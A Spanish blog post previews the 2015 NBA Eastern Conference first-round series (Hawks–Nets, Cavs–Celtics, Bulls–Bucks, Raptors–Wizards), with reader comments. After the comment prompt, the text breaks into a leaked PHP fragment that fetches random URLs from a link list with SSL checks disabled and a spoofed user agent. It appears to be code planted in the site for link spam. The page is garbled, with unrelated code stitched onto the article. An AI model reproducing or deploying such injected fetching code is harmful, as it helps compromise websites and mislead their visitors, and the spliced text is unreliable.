Previa Playoffs: Conferencia Este

17 de April de 2015 por txusma

A apenas 24 horas del inicio de los Playoffs 2015, analizamos cada uno de los emparejamientos de primera ronda de la Conferencia Este, donde los Hawks han dominado de principio a fin y los Cavs se presentan como principal amenaza.

Atlanta Hawks (1) vs Brooklyn Nets (8)

hawks_nets

Balance Hawks: 60-22
Balance Nets: 38-44
Duelos directos 2014-2015: Hawks 4 – Nets 0

Análisis por Txusma

Russell Westobrook tendrá que ver desde su casa como un equipo con 7 victorias menos que sus Thunder disputa los playoffs de la NBA. Cada año surge la misma discusión pero lo de esta temporada roza el esperpento. Los Hawks han barrido a los Nets en todos y cada uno de los partidos que han disputado. No en vano, los de Mike Budenholzer son uno de los mejores equipos de la liga a ambos lados de la cancha. Concretamente son los sextos de toda la liga en eficacia defensiva y nadie puede negar que es todo un placer verlos atacar. Su juego se basa en el equipo y disponen del quinteto más reconocible de la liga desde el de aquellos Detroit Pistons de la 2003-2004. Jeff Teague, Kyle Korver, DeMarre Carroll, Paul Millsap y Al Horford, nominados todos ellos como “mejor jugador del Este” del mes de febrero cuando el equipo alcanzó las 19 victorias consecutivas (la mejor racha de un equipo esta temporada y la sexta mejor marca de todos los tiempos), y presentes todos menos Carroll en All Star Game de New York.

Enfrente, unos Nets que en palabras de su propio entrenador, Lionel Hollins, no tienen ningún tipo de ventaja sobre sus rivales. Yo podría hablar de lo bien que ha acabado la temporada Brook Lopez, nominado jugador del Este dos semanas consecutivas, de un jugador como Joe Johnson, que puede explotar en cualquier momento, de Thaddeus Young, que llegó al equipo en trade deadline y se hizo inmediatamente con un puesto de titular, o de jóvenes como Mason Plumlee o del croata Bojan Bogdanovic, que acabó la temporada con nada menos que 28 puntos ante los Magic, pero sería engañarse. A la hora de la verdad, el quinteto de los Hawks superará al de los Nets en todos los aspectos, los Dennis Schroeder (ojito con el alemán), Pero Antic, Kent Bazemore, Mike Scott, etc. mantendrán el martillo pilón a buena potencia, y los partidos caerán uno a uno por su propio peso como fruta madura. Mucho tendría que pasar para que los Nets ganen no ya la serie sino un solo partido. Y Westbrook, en casa…

Pronóstico: Atlanta Hawks 4 – Brooklyn Nets 0

Cleveland Cavaliers (2) vs Boston Celtics (7)

cavs_celtics

Balance Cavaliers: 53-29
Balance Celtics: 40-42
Duelos directos 2014-2015: 2-2

Análisis por Txusma

Hubo un momento a principios de temporada en el que parecía que los Cleveland Cavaliers iban a arder. LeBron James acababa de perderse un par de semanas por lesión y el equipo estaba por debajo del 50% de victorias, 19-20 para ser exactos. Y de repente, algo hizo “click” y todo se puso en su sitio. Los Cavs empezaron a parecerse a lo que todos esperábamos, LeBron y Kyrie Irving subieron su nivel de juego, Kevin Love empezó a parecer menos perdido que antes y las adquisiciones del trade deadline (Timofey Mozgov, JR Smith, Iman Shumpert) aportaron justo lo que se esperaba de ellos. A estos Cavs y a este “King” James no les va a toser un séptimo de una de las peores conferencias Este de todos los tiempos, aunque sean unos Boston Celtics en franca (y más que interesante) progresión.

El trabajo de Danny Ainge en los despachos y, sobre todo, el de Brad Stevens en el banquillo ha empezado a dar a sus frutos. Aunque no lo parezca, los verdes son el segundo mejor equipo del Este tras el All Star ¿El problema? Que el mejor ha sido precisamente su rival, los Cleveland Cavaliers. El principal culpable de este cambio es, sin duda, Isaiah Thomas, que llegó en el trade deadline procedente de los Phoenix Suns. Con él llegó un poder anotador del que adolecía el equipo y que es básico saliendo desde el banquillo. Tampoco hay que desmerecer el trabajo de Jonas Jerebko y Jae Crowder, también incorporados a mitad de temporada. Estos tres jugadores, junto a Kelly Olynyk, forman el núcleo de un banquillo que aporta muchas soluciones en caso de que los titulares no vean aro, algo que les sucede a menudo debido a sus características, o de que Stevens necesite cambiar urgentemente el planteamiento del encuentro.

De todas maneras, los Celtics tendrían que jugar muy por encima de sus posibilidades y los Cavs sufrir algún tipo de lesión para tener alguna oportunidad en la serie. Defender simultáneamente a LeBron James y Kyrie Irving será muy complicado aunque los Celtics disponen de jugadores capacitados para ello en la medida de sus posibilidades (Jae Crowder, Avery Bradley), por lo que es posible que en algún partido concreto en Boston suene la flauta. Cleveland acabará ganando fácil pero los cachorros verdes aprovecharán la serie para crecer. Su momento todavía está por llegar.

Pronóstico: Cleveland Cavaliers 4 – Boston Celtics 1

Chicago Bulls (3) vs Milwaukee Bucks (6)

bulls_bucks

Balance Bulls: 50-32
Balance Bucks: 41-41
Duelos directos 2014-2015: Bulls 3 – Bucks 1

Análisis por Viva_Dirk

Uno de los cocos de la liga llega finalmente como tercer clasificado de la conferencia, con las eternas dudas sobre la salud de Derrick Rose como clave para saber hasta dónde pueden llegar. Incluso sin él no deberían tener grandes problemas para ganar esta serie con solvencia. El juego interior de Chicago tiene la obligación de pasar por encima de los Pachulia, Ilyasova y Henson, mientras que Jimmy Butler despliega toda su energía a los dos lados de la cancha. El aspecto físico juega en contra de los Bulls, de ahí que sea fundamental para ellos acortar la serie todo lo posible si no quieren ver truncada su temporada de forma prematura.

Gran temporada de los Bucks de la mano de Jason Kidd, que pese a tomar decisiones bastante extrañas ha colocado sin problemas al equipo en Playoffs. Todo el arsenal de estos ciervos llega desde el perímetro, de hecho sus 3 máximos anotadores parten desde ahí. Que MCW y Giannis Antetokounmpo puedan superar con asiduidad a sus pares será la gran baza ofensiva de estos Bucks, mientras Middleton e Ilyasova esperan en la línea de 3 para castigar las ayudas que los dos primeros recibirán.

Muy mal se le tendría que dar a Chicago para que el cuarteto formado por Pau, Noah, Gibson y Mirotic no sea una barrera infranqueable para los Bucks, pero como hemos dicho, si la serie se hace larga, esa barrera será cada vez más débil, y en esas circunstancias la experiencia que atesoran los Bulls se vería recortada por los años de menos que tienen los de Milwaukee.

Pronóstico: Chicago Bulls 4 – Milwaukee Bucks 1

Toronto Raptors (4) vs Washington Wizards (5)

raptors_wizards

Balance Raptors: 49-33
Balance Wizards: 46-36
Duelos directos 2014-2015: Raptors 3 – Wizards 0

Análisis por TheDeerHunter

Estamos ante la eliminatoria más equilibrada del Este sobre el papel a pesar de lo que se adivina de sus enfrentamientos previos. Dos sólidos equipos que se codearon con la élite del Este antes de Navidad pero que sufrieron cierta flojera en la segunda mitad de la campaña. A pesar de ello, ambos han registrado su mejor balance de victorias en años, e incluso las 49 de los Raptors suponen el récord histórico de la franquicia. Se mide uno de los ataques más potentes de la liga (Raptors, 104 puntos por partido, mejores anotadores de la conferencia) contra una de las defensas más rocosas que quedan en competición (Wizards, 98.7 puntos encajados por partido). Si los capitalinos tratan de revivir, como mínimo, la segunda ronda que disputaran el año pasado, los canadienses tratarán de ganar su primera eliminatoria de Playoffs desde 2001, cuando les lideró Vince Carter sobre los New York Knicks de Jeff Van Gundy. La estadística dice que entre dos equipos tan igualados en la regular, el efecto de la ventaja campo no tiene apenas trascendencia.

Se enfrentan dos quintetos muy bien definidos y equilibrados, que determinan el carácter de sus equipos. Lowry, DeRozan, Ross, Amir y Valanciunas frente a Wall, Beal, Pierce, Nene y Gortat. Mientras que se percibe una ligera ventaja inclinándose a favor del de los Wizards, estos deberán sudar muchos minutos en cancha si quieren resistir la poderosa segunda unidad canadiense con el candidato a mejor sexto, Louis Williams, junto a Vásquez, Patterson y Hansbrough. Como curiosidad, ni Valanciunas ni Gortat han sido la opción de sus técnicos cuando estos equipos se juegan las habichuelas en los finales igualados.

Creemos que se avecina una serie larga y emocionante, sin un favorito claro. Los Wizards deben tratar por todos los medios de plantear una eliminatoria a la antigua usanza, donde el ritmo bajo les facilite imponer su defensa, el poderío físico de sus hombres grandes y su mayor experiencia en estas lides. Paul Pierce será clave para emular a sus Nets del curso pasado. Los Raptors, por su parte, deben tratar de parecerse todo lo posible a su mejor versión de regular, con un alto grado de talento desplegado. El estado físico de Lowry, así como el dulce momento que está viviendo un jugón como Louis Williams, pueden inclinar la balanza a su favor.

Pronóstico: Toronto Raptors 4 – Washington Wizards 3

¡Y no dejéis de participar en la porra de los Playoffs!

Comenta

5 comentarios a esta entrada

  1. Nacho dice:
    #1

    Llegamos a PO!!!
    Pronósticos del Este fáciles en esta primera ronda. El Wizards-Raptors es el que puede generar más dudas. Pero para dudas,las de final de temporada de los de la capital. En las mismas andaban los canadienses, pero parece que se entonaron un poco, y llegan ahora con una experiencia que no tenían el año pasado. Creo que debería aparecer demasiado Wall y demasiado Pierce para que los Wizards llegaran al séptimo partido, y allí se se podrían llevar la serie.
    Los Cavs parecen el único equipo en forma del Este, pero ese análisis quedará para segunda ronda, porque no parecen muy atractivos el resto de duelos, a priori claro.
    Y aunque no toque aquí, me alegro mogollón de que Westbrook y sus Thunder se queden fuera, y Txusma, con todo el cariño del mundo, que Russell vea las eliminatorias en casa con más victorias es un argumento viejo y vacuo a estas alturas, porque eso se sabía de antemano.

      Citar

  2. Ruxixón dice:
    #2

    Se dibuja una primera ronda del este sosaina,a priori con series muy desequilibradas,y la única que todo el mundo damos como de un nivel parejo,Toronto – Washington,no sé yo el nivel de juego que se verá,aunque el ambiente del We The North de la ciudad canadiense siempre anima a ver algún partido.A pesar de esto tengo ganas de ver si el nivel de juego de Atlanta vuelve por sus fueros,muchas ganas de ver al enano Thomas ponerse el mundo por bandera y liarle alguna a Cleveland (a pesar de que sea mi equipo) y muchísimas ganas por comprobar la medida de Antetokounmpo en estas lides.

      Citar

  3. Jose Luis dice:
    #3

    tu no eras de los Warriors Ruxixon?

      Citar

  4. Ruxixon dice:
    #4

    Soy mas de jugadores a decir verdad,y de ahi a los equipos.Curry me encanta(es mi n°2),pero es que mi jugador favorito es LeBron así que Cleveland me roba el corazón xD

      Citar

  5. Jose Luis dice:
    #5

    Entiendo… xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>